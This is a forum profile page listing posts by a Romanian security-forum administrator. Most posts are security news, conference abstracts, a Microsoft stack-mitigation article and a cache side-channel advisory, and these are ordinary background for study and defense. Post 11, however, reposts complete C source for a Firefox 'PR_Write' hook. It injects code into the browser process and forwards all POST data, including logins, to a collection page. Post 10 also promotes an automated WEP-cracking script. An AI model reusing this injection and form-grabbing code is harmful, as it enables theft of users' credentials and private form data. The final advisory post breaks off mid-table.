Jump to content

Nytro

Administrators
  • Posts

    18794
  • Joined

  • Last visited

  • Days Won

    742

Everything posted by Nytro

  1. Daca ai Linux: ls -ls /etc/ssl/certs/ Daca ai Windows: 1. Start 2. certmgr.msc 3. Intermediate Certification Authorities 4. Certificates In ambele cazuri cauta certificatul: "StartCom Class 1 Primary Intermediate Server CA" Si verifica data de expirare. Pe Linux, in functie de calea certificatului (la mine era symlink): openssl x509 -in /usr/share/ca-certificates/mozilla/StartCom_Certification_Authority.crt -startdate -enddate Daca nu e certificatul, descarcati asta: http://www.startssl.com/certs/sub.class1.server.ca.pem In "/etc/ssl/certs/". PS: Daca aveti Windows 95/98/XP si nu ati facut update-uri sa va dau la muie.
  2. [h=1]FBI demands SSL Keys from Secure-Email provider Lavabit in Espionage probe[/h] During the summer, The Secure email provider 'Lavabit' and preferred service for PRISM leaker Edward Snowden decided to shut down after 10 years to avoid being complicit in crimes against the American people. The U.S. Government obtained a secret court order demanding private SSL key from Lavabit, which would have allowed the FBI to wiretap the service’s users, according to Wired. Ladar Levison, 32, has spent ten years building encrypted email service Lavabit, attracting over 410,000 users. When NSA whistleblower Edward Snowden was revealed to be one of those users in July, Ladar received the court orders to comply, intended to trace the Internet IP address of a particular Lavabit user, but he refused to do so. The offenses under investigation are listed as violations of the Espionage Act and Founder was ordered to record and provide the connection information on one of its users every time that user logged in to check his e-mail. The Government complained that the Lavabit had the technical capability to decrypt the information, but that Lavabit did not want to defeat its own system, So on the same day, U.S. Magistrate Judge Theresa Buchanan ordered Lavabit to comply, threatening Lavabit with criminal contempt. FBI's search warrant also demanded all information necessary to decrypt communications sent to or from the Lavabit email account redacted including encryption keys and SSL keys. But because Lavabit hadn’t complied till August 5, and a court ordered that Levison would be fined $5,000 a day beginning August 6, for every day he refused to turn over the key. On August 8, Levison finally decided to shut down Lavabit. “I’m taking a break from email,” said Levison. “If you knew what I know about email, you might not use it either.” Sursa: FBI demands SSL Keys from Secure-Email provider Lavabit in Espionage probe - The Hacker News
  3. Hitb 2013 - Nikita Tarakanov - Exploiting Hardcore Pool Corruptions In Ms Windows Kernel Description: PRESENTATION ABSTRACT: Each new version of Windows OS Microsoft enhances security by adding security mitigation mechanisms -- Kernel land vulnerabilities are getting more and more valuable these days. For example, the easy way to escape from a sandbox (Google Chrome sandbox for example) is by using a kernel vulnerability. That's why Microsoft struggles to enhance security of Windows kernel. Kernel Pool allocator plays significant role in security of whole kernel. Since Windows 7, Microsoft started to enhance the security of the Windows kernel pool allocator. Tarjei Mandt aka @kernelpool has done a great job in analyzing the internals of the Windows kernel pool allocator and found some great attack techniques, mitigations bypasses etc. In Windows 8 however, Microsoft has eliminated almost all reliable techniques of exploiting kernel pool corruptions. An attack technique by Tarjei needs a lot of prerequisites to be successful and there are a lot of types of pool corruptions where his techniques don't work unfortunately. What if there is no control over overflown data? What if there is constant (zero bytes) and you have no chance to apply one of Tarjei's techniques? What if there is uncontrolled continuous overflow and #PF and BSOD is unavoidable? So what to do? Commit suicide instantly? NO! Come and see this talk! We present a technique of 100% reliable exploitation of kernel pool corruptions which covers all flavors of Windows from NT 4.0 to Windows 8. ABOUT NIKITA TARAKANOV Nikita Tarakanov is an independent information security researcher who has worked as an IS researcher in Positive Technologies, VUPEN Security and CISS. He likes writing exploits, especially for Windows NT Kernel and won the PHDays Hack2Own contest in 2011 and 2012. He also tried to hack Google Chrome during Pwnium 2 at HITB2012KUL but failed. He has published a few papers about kernel mode drivers and their exploitation and is currently engaged in reverse engineering research and vulnerability search automation. For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA Sursa: Hitb 2013 - Nikita Tarakanov - Exploiting Hardcore Pool Corruptions In Ms Windows Kernel
  4. Hitb 2013 - Travis Goodspeed - Nifty Tricks And Sage Advice For Shellcode On Embedded Systems Description: PRESENTATION ABSTRACT: This lecture presents a bunch of clever tricks that will save you time and headaches when writing exploits for small embedded systems, such as smart meters, thermostats, keyboards, and mice. You'll learn how to write tiny shellcode that's quickly portable to any variant of ARM, as well as how to exploit memory corruption on an 8-bit micro that's incapable of executing RAM. You'll learn how to develop an embedded exploit without a debugger, and how to blindly assemble a ROP chain when you don't have a firmware image. Note: No machines harmed in this lecture had enough RAM to hold CALC.EXE. ABOUT TRAVIS GOODSPEED Travis Goodspeed is a neighborly reverse engineer from Southern Appalachia, where he is rumored to keep a warehouse full of GoodFET boards and a nifty satellite dish. His prior projects include a dozen key-extraction exploits for Zigbee and WSN devices, bootloader exploits for microcontrollers, and the Facedancer, a tool for emulating USB hardware in Python. For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA Sursa: Hitb 2013 - Travis Goodspeed - Nifty Tricks And Sage Advice For Shellcode On Embedded Systems
  5. [h=1]Steganos Safe 14 – licenta GRATUITA[/h] By Radu FaraVirusi(com) on October 2, 2013 Intimitatea online sau offline este o caracteristica cheie pe care toti vor sa o aiba atunci cand stau in fata calculatorului. De cele mai multe ori nu se poate realiza, sau necesita timp si multe programe mai mult sau mai putin utile. Steganos Safe 14 este un produs excelent care combina 8 utilitare de baza pentru realizarea dezideratului enuntat mai sus. “Steganos Safe”, permite crearea unui numar nelimitat de partitii virtuale securizate, folosind tehnologia de criptare 256-bit Advanced Encryption Standard (AES) algorithm, fiecare partitie putand stoca pana la 512 GB de date. “Portable Safe” face acelasi lucru, doar ca foloseste un stick USB, sau un CD\DVD. Puteti cripta orice stick USB sau CD, si introdus in orice alt PC va solicita parola setata anterior pentru a accesa datele stocate. “Private Favorites” cripteaza site-urile adaugate la bookmark in Internet Explorer pentru a nu fi accesate de persoane neutorizate. “File Manager” permite crearea unor fisiere criptate, extragerea continutului din acestea si gestionarea lor intr-un mod corespunzator. “Shredder” sterge definitiv orice fisier pe care nu doriti sa-l mai recuperati vreodata nici dumneavoastra, nici alta persoana ce va accesa PC-ul. Foloseste mai multe tehnologii, printre care DoD 5220.22-M/NISPOM 8-306. “Password Manager” va permite crearea unor liste criptate, ce contin conturi de utilizator, parole, cod-uri PIN, conturi bancare si alte parole si nume de utilizator folosite online sau offline pe respectivul calculator. Astfel nu va trebui sa le cautati peste tot cand aveti nevoie de ele si nici nu le veti duce grija, deoarece sunt in siguranta si protejate de Steganos. Celelalte utilitare sunt “E-mail Encryption”, si “Internet Trace Destructor”. Pentru a obtine GRATUIT acest soft, accesati link-ul de mai jos: https://www.steganos.com/specials/?m=chip&p=safe14 Introduceti o adresa de e-mail valida si apasati “OK“. Veti primi serialul de inregistrare prin e-mail. Sursa: Steganos Safe 14 – licenta GRATUITA
  6. Oare sunt singurul caruia ii pare bine?
  7. 50 Security Issues Fixed with the Release of Chrome 30 - 50 vulnerabilities fixed in Chrome October 2nd, 2013, 07:32 GMT · By Eduard Kovacs Google has released Chrome 30, and a total of 50 security issues have been fixed in this latest version. The list of vulnerabilities reported by external researchers includes ten high-impact and six medium-impact flaws. The high-impact issues refer to use-after-free vulnerabilities in inline-block rendering, in PPAPI, in XML document parsing, in DOM, in resource loader, in the Windows color chooser dialog, and in template element. A memory corruption in V8 and an address bar spoofing bug related to the “204 No Content” status code also fall into this category. The medium-impact vulnerabilities include a use-after-free in Web Audio, an out of bounds read in the same component, and an out of bounds read in URL parsing. The security researchers credited for finding vulnerabilities are Atte Kettunen of OUSPG, Boris Zbarsky, Chamal de Silva, Byoungyoung Lee, and Tielei Wang of Georgia Tech, cloudfuzzer, Khalil Zhani, Wander Groeneveld, Masato Kinugawa, Adam Haile of Concrete Data, and Jon Butler. They’ve been rewarded with a total of $19,000 (€14,000) for their work. Atte Kettunen, cloudfuzzer, and miaubiz have been awarded an additional $8,000 (€5,900) for working with Google on addressing security issues during the development cycle. Download Google Chrome Sursa: 50 Security Issues Fixed with the Release of Chrome 30
  8. Undetectable hardware Trojans could compromise cryptography By Brian Dodson October 2, 2013 Undetectable hardware Trojans could subvert cryptographic security (Image: Shutterstock) Researchers have shown that it is possible to compromise the functioning of a cryptographic chip without changing its physical layout. Based on altering the distribution of dopants in a few components on the chip during fabrication, this method represents a big challenge for cyber-security as it is nearly impossible to detect with any currently practical detection scheme. Progress in the design and fabrication of processor chips is mainly aimed at making them faster and smaller. There is another important requirement, however – ensuring that they function as intended. In particular, the cryptographic functions of new chips must provide the level of security with which they were designed. If they fail in this task, even use of sophisticated security software, physical isolation, and well vetted operators cannot ensure the security of a system. Such structural attacks on the functions of a chip are called hardware Trojans, and are capable of rendering ineffective the security protecting our most critical computer systems and data. Both industry and governments have put a great deal of not very public effort into the problem of hardware Trojans. The most reliable tests to find hardware Trojans will be applied to the finished product. So how are they tested and what are the implications of the new research? Functional Testing Functional testing is the sort of testing with which most people are familiar. The function of a chip is tested by applying patterns of test inputs to the input pins of the chip. The outputs are monitored, and compared with the outputs expected from the original specifications and definition of the chip. Extremely sophisticated devices for functional testing abound in the world of IC design and fabrication. Unfortunately, such testing is usually not very effective for finding hardware Trojans. It is impossible in any practical sense to test all patterns of activation of all components in the chip, so the test patterns are usually designed to test all the known gates on the chip. While such patterns catch most accidental design flaws and fabrication defects, they are likely to fail to activate malicious logic elements added to the original design. Optical Reverse-Engineering The most direct approach to find hardware Trojans is to disassemble the chip layer by layer, and compare it with the correct structural design. If there is a visible difference (possibly detected with scanning electron microscopy rather than a camera) between the layers of the chip as designed and the layers of the actual chip, there is a problem that needs to be diagnosed. This is essentially the procedure that would be undertaken to reverse-engineer a chip. While reverse-engineering a chip sounds like a good way to detect hardware alterations, the problem is considerably more slippery when the goal is to find hardware Trojans. When reverse-engineering is the goal, you start with your competitor's chip, and try to decipher and duplicate the chip. While various techniques can be applied to the chip to complicate this process, you are never in any doubt that the original chip works properly. If a production chip is suspected of harboring hardware Trojans, however, the structure revealed in the disassembly process must be compared with some reference design. The ideal reference is a "golden chip", meaning a chip known to accurately reflect the goals of the desired chip functionality with no additions, subtractions, or alterations. We'll talk about where such a chip might come from later. Side-channel analysis Side channels refer to side effects of proper operation of a chip being subjected to a functional test. These include the amount of power consumed by the chip, the timing of the signals at the chip pins, and emissions of electromagnetic radiation. Hardware Trojans that add, subtract, or alter enough gates can often be detected in this manner, but the proportion of affected gates has to be one in a thousand or more. In a microprocessor with a billion gates, a million gates would have to be changed for the corresponding Trojan to be detected. Smaller Trojans simply escape notice. The Golden Chip All of the testing methods described above are far more likely to find circuit flaws and faults if they have a certified reference chip, a golden chip, to which the testing results can be compared. Comparison to simulated chip structure and function are not likely to be sufficiently accurate to ensure detection of Trojans. Unfortunately, the complex design and fabrication process is nearly always farmed out to contractors and subcontractors worldwide. While this approach to design and fabrication is cost-effective, the overall manufacturing entity gives up a good deal of control over the various stages of the process. As a result, it is hard to be sure that your golden chip isn't simply a gilt imitation. If a supposedly golden chip actually contains the same hardware Trojans as do the production chips, all the comparative testing in the world won't find them. Dopant-level hardware Trojans As if the potential problems of detecting hardware Trojans in the form of additional and/or sabotaged circuitry are not sufficiently difficult, a team of researchers from the University of Massachusetts, the Technical University of Delft, the University of Lugano, and the Gortz Institute for IT-Security have identified new way in which hardware Trojans could be added to a chip which is essentially undetectable by any of the methods described above. Using that technique, they succeeded in sabotaging the pseudorandom number generator at the heart of the cryptographic functions of the Intel Ivy Bridge processors, which include most of the Intel i3, i5, and i7 processors built using Intel's 22 nm manufacturing process. The UMass team has demonstrated disruption of the Ivy Bridge chip so that it generates far simpler pseudorandom numbers. The resulting chip does not provide acceptable levels of cryptographic security. The authors of this research point out that altered doping profiles are currently used in commercial code-obfuscation systems to prevent an attacker from optically reverse-engineering a chip. This suggests that the changes required to convert an inverter gate into a Trojan gate will not be detected by such structural analysis. Methods do exist to probe the local doping characteristics of a silicon layer, which could in principle be used to identify a hardware Trojan of the type described in the present research. However, these methods examine one tiny patch of material at a time, making their use to check a billion transistors impractical. The doping-profile Trojan approach identified by the UMass-based research team could be applied in many ways to compromise the functionality of cryptographic systems without being noticed. Now that the possibility of such stealthy attacks on cryptographic systems has been established, a great deal of effort will doubtless go into our ability to detect them. Source: Stealthy Dopant-Level Hardware Trojans[PDF] Sursa: Undetectable hardware Trojans could compromise cryptography
  9. Software Defense: mitigating stack corruption vulnerabilties swiat 2 Oct 2013 3:16 AM Introduction One of the oldest forms of memory safety exploitation is that of stack corruption vulnerabilities, with several early high-profile exploits being of this type. It seems fitting therefore to kick off this Software Defense series by looking at the status of software defense today with respect to this age-old problem. Mitigating stack-based corruption vulnerabilities The most common form of stack corruption – overrun of a buffer beyond the amount of stack space that was allocated for it – has been mitigated to some degree since Windows XP via the compiler-based /GS feature. A copy of a per-module random value, the /GS cookie, is placed between the stack local variables and stack metadata including the return address. Before using the return address, the program verifies the integrity of this local copy of the /GS cookie: if its value does not match the master per-process value then an overrun is assumed to have taken place and the program is terminated. The limitations of this defensive device have driven a number of refinements over the years; the main ones are summarized in the following table: Scope of GS protection For performance reasons only a subset of functions are protected with a GS cookie. The scope of this protection was initially aimed primarily at character arrays, where attackers would supply malicious strings, often over the network that the program did not handle correctly. GS enhancements in Visual Studio 2010 extended the scope of GS protection to functions with a far more general range of data structures. Visual Studio 2013 builds on this further and also protects arrays of pointers. Protecting a function with /GS has a codesize cost – the prolog code to set up the GS cookie on the stack and the epilog to verify its value - and the runtime cost of actually executing these extra instructions. The cost of extending the scope of GS protection has been partially offset by a new compiler optimization: if usage of the buffers that have led to the GS cookie can be proven safe by the optimizer – i.e. all writes to the memory associated with these variables is within the bounds of their allocated stack space – then the GS cookie is eliminated. Enabling /GS still typically only inserts a GS check on less than 10% of functions – though clearly this varies considerably depending on usage of local variables in each individual application. Evading the GS check through exception abuse An important aspect touched on above deserves further discussion – the cookie check only occurs at the end of the function. This means that there is a window between the stack corruption and the GS check in which an attacker can seek to gain control. One favoured approach has been to trigger an exception and abuse the resulting exception handling process. On x86, exception metadata associated with SEH is stored on the stack: this includes pointers to the handler code that should be invoked. If the attacker can use the initial stack corruption to modify this SEH metadata – replacing the function pointer with an address of his choosing – then when the exception dispatching code runs, it will transfer control to the attacker-controlled address. Mitigating exception metadata abuse on x86 platforms Again compile-time techniques can help - /SAFESEH effectively creates a whitelist of exception handler addresses. In the corrupted SEH metadata scenario above, the attacker’s modified ‘pointer to exception handler’ address is not on the whitelist thus defeating the simple form of this exploitation technique. It is however costly: all code needs to be recompiled to benefit – as any non-SAFESEH code in the program introduces a “code with unknown SAFESEH whitelist” module – which for application compatibility purposes means that any address inside that module is assumed to be on the whitelist. Windows XP SP2 included a recompile of most OS binaries with /SAFESEH – but even that is not sufficient. Any 3rd party browser plugin (not compiled with /SAFESEH) provided a potential means to evade the /SAFESEH validation. SEHOP SEHOP, supported initially in Windows Vista SP1 (off-by-default) and Windows Server 2008 (on-by-default), provides a more robust solution. We previously described SEHOP in detail, but a summary of the basic idea is as follows. When an exception occurs, SEHOP walks the entire list of SEH metadata structures on the stack and verifies that it terminates at a special “known good handler address”. Any attacker corruption of one of these structures overwrites the forward pointer to the next SEH metadata structure and so breaks the integrity of the list, which is therefore detected by the SEHOP check. Windows 7 added support for per-process opt-in to SEHOP. SEHOP in Windows 8 and Windows 8.1 Windows 8 raises the bar in that SEHOP is enabled by default for applications that built to run on Windows 8 and above (more precisely for any application built with subsystem version greater or equal to 6.2 – see /SUBSYSTEM for details). In Windows 8.1 SEHOP is further improved in a couple of ways. First SEHOP now has a range of 64 possible distinguished FinalExceptionHandler values that may be chosen, instead of just the one handler address within the system DLL that was used previously. The actual distinguished FinalExceptionHandler value used to validate the exception handling frame chain is selected at random during process startup, and differs on a per-process basis. The advantage of this is that SEHOP no longer has a system-wide shared secret, but a per-process secret, such that a local attacker can no longer assume that they know the distinguished value required to pass the frame validation check in a separate process on the local machine. All of the possible FinalExceptionHandler values are also valid SafeSEH handlers. Secondly, Windows 8.1 adds support for SEHOP in kernel mode and enables this by default. Like the enhanced version of SEHOP for user mode, kernel mode SEHOP has 64 possible FinalExceptionHandler addresses, so just disclosing the kernel base address is not enough to defeat kernel SEHOP; one has to be able to read arbitrary kernel memory to do that. GS limitations and future work The effectiveness of the GS design described thus far – even if it were applied to every stack frame and one assumed that the cookie check were always reached after stack memory corruption occurred – is limited to cases where the cookie value is altered. This is what is detected. Important classes of stack-based vulnerability therefore remain that are not mitigated today for example targeted attacker-controlled writes to a stack address, or stack underruns – i.e. the direction of the writes goes towards the start address of the allocation. Visual Studio 2012 updates /GS to emit range checks to mitigate one of the most common types of targeted write scenario that we were seeing through MSRC. Recently published trend data shows that the number of successful exploits of stack-based vulnerabilities represents but a handful of the set of issues faced by our customers. The obstacles posed by GS, SafeSEH and SEHOP and opt-in to these measures by increasing numbers of developers and IT professionals are likely part of the reason behind this. Investment in static analysis tooling has also likely played a part, some of which is available to developers through compiler warnings such as C4789 and CodeAnalysis warnings such as C6200. The lifetime of a stack-based buffer tends to be shorter than its heap counterpart: it is limited to execution of one function – albeit potentially with many callees – making it more tractable to completely analyse its use across the entire program. By contrast pointers to heap allocations are frequently stored in multiple objects with a more complex usage pattern by the program, making it harder for analysis to track usage of a heap buffer with the same level of precision. Although some unmitigated stack-based vulnerability classes do occasionally arise in practice – for example MS08-067 which was an underrun of a stack-based array, these are relatively isolated examples. As attacker focus has shifted to the heap, so the priority accorded to improving defensive measures there has increased. Conclusion Exploitation of stack-based corruption vulnerabilities is one of the oldest forms of memory safety exploit. History shows a succession of mitigation refinements developed to counter to attacker innovations in this area. We note a series of evolutions: - Mitigation robustness and completeness has improved over time, including the protection of arrays of pointers by /GS in Visual Studio 2013 and a move to a per-process rather than a system-wide secret for SEHOP in Windows 8.1. - Counter-measures to thwart exception handler abuse have evolved from expensive (from an engineering perspective) measures such as /SAFESEH that requires recompilation to OS-based SEHOP that can be applied on a per-process basis to existing applications. - Default settings have evolved over time; e.g. user-mode SEHOP is now on-by-default for applications designed for Windows 8 and Windows 8.1, and kernel mode SEHOP is both new and enabled in Windows 8.1. A state of relative maturity has been reached with fewer stack-based vulnerabilities being reported or exploited. Does this mean we are “done”? – by no means! Rather attacker attention appears to have turned to other less mature areas. And as attacker focus has shifted, so has defense. The next article takes a closer look at some of the advances related to memory corruption on the heap. Tim Burrell, MSEC Security Science Sursa: https://blogs.technet.com/b/srd/archive/2013/10/02/software-defense-mitigating-stack-corruption-vulnerabilties.aspx?Redirected=true
  10. Automated Wep Cracking With Wiffy Script Description: In this tutorial for Cr0w's Place we are cracking the WEP protocol with an automated script called Wiffy. You can download Wiffy.sh from here: Nitrobits.com - Download wiffy.sh You can buy Alfa AWUS036H card that I used from: Amazon.com : Alfa AWUS036H 1000mW 1W 802.11b/g USB Wireless WiFi network Adapter with 5dBi Antenna and Suction cup Window Mount dock - for Wardriving & Range Extension : Usb Computer Network Adapters : Computers & Accessories Compatibility list for wifi hardware: compatibility_drivers [Aircrack-ng] Everything you are going to see is for educational purposes only, so operate carefully and in your own property. I bring no responsibility in what happens to you if you act irresponsibly. If you like my job please Subscribe. Thank You For Watching. Sursa: Automated Wep Cracking With Wiffy Script
  11. [h=1][C]FireFox PR_Write Hook[/h][h=3] TheAnomaly Posted 24 December 2010 - 05:05 PM [/h]This is FireFox DLL-less PR_Write function hooker, in other words it will send all POST data sent from FireFox to your own page where it can be sorted and stored. It can be optimized by using other thread or process for sending the captured POST data, but at the moment it doesnt slow FireFox really. Its tested with version 3.6 or so but should works on latest version too. #include <stdio.h>#include <windows.h> #include <Tlhelp32.h> #include <wininet.h> typedef HMODULE (WINAPI *GMH) (LPCTSTR); typedef FARPROC (WINAPI *GPA) (HMODULE,LPCSTR); typedef int (WINAPI *VP) (LPVOID,SIZE_T,DWORD,PDWORD); typedef HINTERNET (WINAPI *IO) (LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD); typedef HINTERNET (WINAPI *IC)(HINTERNET,LPCTSTR,INTERNET_PORT,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR); typedef HINTERNET (WINAPI *HOR) (HINTERNET,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR*,DWORD,DWORD_PTR); typedef BOOL (WINAPI *HSR)(HINTERNET,LPCTSTR,DWORD,LPVOID,DWORD); typedef VOID (WINAPI *Slep)(DWORD); typedef struct { GMH GetMH; //GetModuleHandle GPA GetPA; //GetProcAddress VP SetVP; //VirtualProtect Slep Slepx; //Sleep char ModuleName[36]; //"nspr4.dll" char Proc[36]; //"PR_Write" BYTE *PR_Write; BYTE *nptr; DWORD *bptr; DWORD OldProtect; char blank[3]; char localhost[16]; char post[10]; char visit[16]; char header[64]; HINTERNET OpenHandle; HINTERNET ConnectHandle; HINTERNET Handle; int nLen; char *pVar; IO IOx; IC ICx; HOR HORx; HSR HSRx; } Inject_Data; void Hook(Inject_Data *pData); int main() { Inject_Data Data; LPVOID Mem,Prm; HANDLE rThread; HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); PROCESSENTRY32 ProcessInfo; ProcessInfo.dwSize = sizeof(PROCESSENTRY32); LoadLibrary("wininet.dll"); Data.GetMH =(GMH) GetProcAddress(GetModuleHandle("kernel32.dll"),"GetModuleHandleA"); Data.GetPA = (GPA)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress"); Data.IOx = (IO)GetProcAddress(GetModuleHandle("wininet.dll"),"InternetOpenA"); Data.ICx = (IC)GetProcAddress(GetModuleHandle("wininet.dll"),"InternetConnectA"); Data.HORx = (HOR)GetProcAddress(GetModuleHandle("wininet.dll"),"HttpOpenRequestA"); Data.HSRx = (HSR)GetProcAddress(GetModuleHandle("wininet.dll"),"HttpSendRequestA"); Data.SetVP = (VP)GetProcAddress(GetModuleHandle("kernel32.dll"),"VirtualProtect"); Data.Slepx = (Slep)GetProcAddress(GetModuleHandle("kernel32.dll"),"Sleep"); wsprintf(Data.ModuleName,"nspr4.dll"); wsprintf(Data.Proc,"PR_Write"); wsprintf(Data.localhost,"localhost"); wsprintf(Data.post,"POST"); wsprintf(Data.visit,"/hit.php"); wsprintf(Data.header,"Content-Type:application/x-www-form-urlencoded"); wsprintf(Data.blank,""); while(Process32Next(handle, &ProcessInfo)) { if(!strcmp(ProcessInfo.szExeFile, "firefox.exe")) { handle = OpenProcess(PROCESS_ALL_ACCESS,0,ProcessInfo.th32ProcessID); Prm = VirtualAllocEx(handle,NULL,sizeof(Data),MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); WriteProcessMemory(handle,Prm,&Data,sizeof(Data),NULL); Mem = VirtualAllocEx(handle,NULL,2000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); WriteProcessMemory(handle,Mem,Hook,2000,NULL); rThread = CreateRemoteThread(handle,NULL,0,(LPTHREAD_START_ROUTINE)Mem,Prm,0,NULL); WaitForSingleObject(rThread, INFINITE); CloseHandle(handle); } } return 0; } void Hook(Inject_Data *pData) { BYTE *temp; goto start; Hooked: __asm{ mov ecx,[esp+0xC] mov eax,[esp+0x8] cmp dword ptr[eax],0x54534F50 // POST? jne prexJMP //its not POST push ecx call getDelta4 //Get the delta getDelta4: pop ecx sub ecx,offset getDelta4 lea eax,Data add eax,ecx pop ecx mov eax,[eax] mov pData,eax mov eax,[esp+0x8] mov temp,eax } pData->pVar = temp; __asm{ nop } __asm{ mov ecx,[esp+0xC] } __asm{ mov temp,ecx } __asm{ nop } pData->nLen = temp; __asm{ nop } *pData->pVar = 0x72; pData->pVar++; *pData->pVar = 0x3D; pData->pVar--; pData->Handle = pData->ICx(pData->OpenHandle,pData->localhost,8080,pData->blank,pData->blank,INTERNET_SERVICE_HTTP,0,0); pData->ConnectHandle = pData->HORx(pData->Handle,pData->post,pData->visit,NULL,NULL,NULL,INTERNET_FLAG_KEEP_CONNECTION,0); pData->HSRx(pData->ConnectHandle,pData->header,-1L,pData->pVar,pData->nLen); *pData->pVar = 0x50; pData->pVar++; *pData->pVar = 0x4F; pData->pVar--; prexJMP: __asm{ MOV EAX,DWORD PTR [ESP+4] MOV ECX,DWORD PTR [EAX] } xJMP: __asm{ jmp ExitProcess } Data: __asm{ nop nop nop nop } start: pData->PR_Write = (BYTE*) pData->GetPA(pData->GetMH(pData->ModuleName),pData->Proc); pData->SetVP(pData->PR_Write,6,PAGE_EXECUTE_READWRITE,&pData->OldProtect); //ptr = (BYTE*) Hooked; __asm{ push ecx } __asm{ call getDelta } //Get the delta __asm{ getDelta: } __asm{ pop ecx } __asm{ sub ecx,offset getDelta } __asm{ push eax } __asm{ lea eax,Hooked } __asm{ add eax,ecx } __asm{ mov temp,eax } __asm{ pop eax } __asm{ pop ecx } pData->nptr = temp; pData->nptr = pData->nptr - pData->PR_Write; pData->nptr = pData->nptr - 5; *pData->PR_Write = 0xE9; pData->PR_Write++; pData->bptr = (DWORD*) pData->PR_Write; *pData->bptr = (DWORD) pData->nptr; pData->PR_Write = pData->PR_Write + 4; *pData->PR_Write = 0xCC; pData->PR_Write++; __asm{ push ecx } __asm{ call getDelta1 } //Get the delta __asm{ getDelta1: } __asm{ pop ecx } __asm{ sub ecx,offset getDelta1 } __asm{ push eax } __asm{ lea eax,xJMP } __asm{ add eax,ecx } __asm{ mov temp,eax } __asm{ pop eax } __asm{ pop ecx } pData->nptr = temp; pData->PR_Write = pData->PR_Write - pData->nptr; pData->PR_Write = pData->PR_Write - 5; pData->nptr++; pData->OldProtect = 0; pData->SetVP(pData->nptr,10,PAGE_EXECUTE_READWRITE,&pData->OldProtect); pData->bptr = (DWORD*) pData->nptr; *pData->bptr = (DWORD) pData->PR_Write; temp = (BYTE *) pData; __asm{ push ecx } __asm{ call getDelta2 } //Get the delta __asm{ getDelta2: } __asm{ pop ecx } __asm{ sub ecx,offset getDelta2 } __asm{ push eax } __asm{ push ebx } __asm{ lea eax,Data } __asm{ add eax,ecx } __asm{ mov ebx,temp } __asm{ mov dword ptr[eax],ebx } __asm{ pop ebx } __asm{ pop eax } __asm{ pop ecx } /*start the connection */ pData->OpenHandle = pData->IOx(pData->localhost,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); for( { pData->Slepx(1000); } } Sursa: [C]FireFox PR_Write Hook - Source Codes - rohitab.com - Forums
  12. L3 CPU shared cache architecture is susceptible to a Flush+Reload side-channel attack Overview L3 CPU shared cache architecture is susceptible to a Flush+Reload side-channel attack, resulting in information leakage. allowing a local attacker to derive the contents of memory not belonging to the attacker. Description [TABLE=class: wrapper-table] [TR] [TD]Common L3 CPU shared cache architecture is susceptible to a Flush+Reload side-channel attack, as described in "Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack" by Yarom and Falkner. By manipulating memory stored in the L3 cache by a target process and observing timing differences between requests for cached and non-cached memory, an attacker can derive specific information about the target process. The paper demonstrates an attack against GnuPG on an Intel Ivy Bridge platform that recovers over 98% of the bits of an RSA private key. This vulnerability is an example of CWE-200: Information Exposure.[/TD] [/TR] [/TABLE] Impact [TABLE=class: wrapper-table] [TR] [TD]A local attacker can derive the contents of memory shared with another process on the same L3 cache (same physical CPU). Virtualization and cryptographic software are examples that are likely to be vulnerable. An attacker on the same host operating system only needs read access to the executable file or a shared library component of the target process. An attacker on a different virtual machine similarly needs access to an exact copy of the executable or shared library used by the target process, and the hypervisor needs to have memory page de-duplication enabled.[/TD] [/TR] [/TABLE] Solution [TABLE=class: wrapper-table] [TR] [TD]Apply an Update See the Vendor Information section below for additional information. GnuPG has released GnuPG version 1.4.14 and Libgcrypt 1.5.3 to to address this vulnerability. CVE-2013-4242 has been assigned to the specific GnuPG vulnerability described in the Yarom/Falkner paper. The CVSS score below applies specifically to CVE-2013-4242.[/TD] [/TR] [/TABLE] [TABLE=class: wrapper-table] [TR] [TD]Disable Memory Page De-duplication To prevent this attack on virtualization platforms, disable hypervisor memory page de-duplication.[/TD] [/TR] [/TABLE] Vendor Information (Learn More) [TABLE] [TR=class: row-alt] [TH=bgcolor: #EBEBEB, align: left]Vendor[/TH] [TH=bgcolor: #EBEBEB, align: center]Status[/TH] [TH=bgcolor: #EBEBEB, align: center]Date Notified[/TH] [TH=bgcolor: #EBEBEB, align: center]Date Updated[/TH] [/TR] [TR] [TD=class: vendor, align: left]libgcrypt[/TD] [TD=class: status, align: center]Affected[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]16 Aug 2013[/TD] [/TR] [TR=class: row-alt] [TD=class: vendor, align: left]Linux KVM[/TD] [TD=class: status, align: center]Affected[/TD] [TD=class: notified, align: center]15 Aug 2013[/TD] [TD=class: updated, align: center]16 Aug 2013[/TD] [/TR] [TR] [TD=class: vendor, align: left]Red Hat, Inc.[/TD] [TD=class: status, align: center]Affected[/TD] [TD=class: notified, align: center]13 Sep 2013[/TD] [TD=class: updated, align: center]13 Sep 2013[/TD] [/TR] [TR=class: row-alt] [TD=class: vendor, align: left]VMware[/TD] [TD=class: status, align: center]Affected[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]03 Sep 2013[/TD] [/TR] [TR] [TD=class: vendor, align: left]Xen[/TD] [TD=class: status, align: center]Affected[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]03 Sep 2013[/TD] [/TR] [TR=class: row-alt] [TD=class: vendor, align: left]Cryptlib[/TD] [TD=class: status, align: center]Not Affected[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]03 Sep 2013[/TD] [/TR] [TR] [TD=class: vendor, align: left]GnuTLS[/TD] [TD=class: status, align: center]Not Affected[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]03 Sep 2013[/TD] [/TR] [TR=class: row-alt] [TD=class: vendor, align: left]Intel Corporation[/TD] [TD=class: status, align: center]Not Affected[/TD] [TD=class: notified, align: center]16 Aug 2013[/TD] [TD=class: updated, align: center]03 Sep 